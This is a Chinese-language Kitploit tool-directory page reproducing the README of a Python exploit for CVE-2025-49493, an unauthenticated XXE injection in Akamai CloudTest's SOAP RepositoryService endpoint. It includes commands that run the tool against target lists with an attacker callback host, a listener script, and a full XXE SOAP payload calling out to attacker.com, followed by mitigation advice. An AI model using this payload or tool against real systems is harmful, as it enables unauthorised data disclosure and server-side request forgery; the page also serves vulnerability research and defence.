Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49493 — 这是一个基于 Python 的漏洞利用程序,针对 CVE-2025-49493,该漏洞影响 60 2025.06.02 (12988) 之前版本的 Akamai CloudTest。该漏洞允许通过 SOAP 服务端点进行 XML 外部实体(XXE)注入。 | Kitploit
工具/GitHubGitHub/sh4den/cve-2025-49493
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubsh4den/cve-2025-49493

CVE-2025-49493

这是一个基于 Python 的漏洞利用程序,针对 CVE-2025-49493,该漏洞影响 60 2025.06.02 (12988) 之前版本的 Akamai CloudTest。该漏洞允许通过 SOAP 服务端点进行 XML 外部实体(XXE)注入。

查看仓库
1133个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Akamai CloudTest XXE 漏洞利用 (CVE-2025-49493)

概述

这是一个基于 Python 的漏洞利用程序,针对 CVE-2025-49493,该漏洞影响 60 2025.06.02 (12988) 之前的 Akamai CloudTest 版本。该漏洞允许通过 SOAP 服务端点进行 XML 外部实体 (XXE) 注入。

漏洞详情

  • CVE ID:CVE-2025-49493
  • 漏洞类型:XML 外部实体 (XXE) 注入
  • 严重程度:严重 (CVSS 9.1)
  • 受影响软件:Akamai CloudTest
  • 受影响版本:60 2025.06.02 (12988) 之前
  • 攻击向量:网络
  • 需要认证:否

技术细节

该漏洞存在于 /concerto/services/RepositoryService SOAP 端点中,该端点处理 XML 输入时未对外部实体进行适当的清理。攻击者可以构造恶意 XML 载荷来触发 XXE 攻击,可能导致以下后果:

  • 信息泄露
  • SSRF(服务器端请求伪造)
  • 拒绝服务
  • 在特定配置下可能实现 RCE

功能特性

  • 目标发现:自动识别 Akamai CloudTest 实例
  • 漏洞检测:检查易受攻击的端点和相关迹象
  • XXE 利用:发送带有 XXE 载荷的构造 SOAP 请求
  • 多目标支持:支持从目标文件批量处理
  • 详细日志记录:带时间戳的全面彩色日志记录
  • 错误处理:针对网络问题的稳健错误处理

安装

前提条件

  • Python 3.6 或更高版本
  • pip 包管理器

依赖项

安装所需包:

pip install -r requirements.txt

或手动安装:

pip install requests urllib3 colored pyfiglet

使用方法

基本用法

python main.py targets.txt xxe.attacker.com

高级用法

# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

命令行选项

positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

目标文件格式

创建一个 targets.txt 文件,每行一个目标:

https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

设置 XXE 服务器

选项 1:使用 Burp Collaborator

  1. 打开 Burp Suite Professional
  2. 转到 Burp > Burp Collaborator 客户端
  3. 点击“复制到剪贴板”以获取你的 Collaborator URL
  4. 将此 URL 用作 xxe_server 参数

选项 2:使用 Interactsh

  1. 安装 interactsh:go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. 运行:interactsh-client
  3. 使用提供的 URL 作为 xxe_server 参数

选项 3:自定义 HTTP 服务器

设置一个简单的 HTTP 服务器以捕获请求:

# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

漏洞利用流程

  1. 目标验证:验证 URL 格式和可访问性
  2. 漏洞检测:
    • 检查响应中的 CloudTest 迹象
    • 验证 SOAP 服务端点是否存在
  3. XXE 载荷生成:创建带有 XXE 的恶意 SOAP 信封
  4. 漏洞利用:向易受攻击的端点发送构造的请求
  5. 结果分析:分析响应中的成功迹象

XXE 载荷结构

该漏洞利用程序使用以下 XXE 载荷结构:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

缓解措施

对于管理员

  1. 立即行动:

    • 将 Akamai CloudTest 更新到 60 2025.06.02 或更高版本
    • 监控日志中可疑的 XML 处理活动
    • 实施网络分段以限制暴露面
  2. 长期解决方案:

    • 在 XML 解析器中禁用 XML 外部实体处理
    • 实施输入验证和清理
    • 使用允许列表进行 XML 处理
    • 定期进行安全评估

对于开发者

  1. 安全的 XML 处理:

    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. 输入验证:

    • 根据严格的模式验证所有 XML 输入
    • 在 XML 处理之前清理用户控制的数据
    • 实施适当的错误处理

参考资料

  • xbow 的原创研究
  • Akamai CloudTest 变更日志
  • CVE-2025-49493 详情
  • OWASP XXE 防护

法律免责声明

本工具仅用于教育和授权测试目的。用户有责任确保在测试任何系统之前获得适当授权。作者不对因使用本工具而造成的任何误用或损害负责。

贡献

  1. Fork 该仓库
  2. 创建一个功能分支
  3. 进行你的更改
  4. 如适用,添加测试
  5. 提交一个 pull request

许可证

本项目采用 MIT 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。

作者

  • 原创研究:xbow, 3th1c_yuk1
  • 漏洞利用开发:安全研究团队
  • CVE 分配:CVE-2025-49493

变更日志

v1.0.0

  • 初始版本
  • 基本的 XXE 漏洞利用功能
  • 目标文件支持
  • 全面的日志记录
  • 错误处理改进
下载工具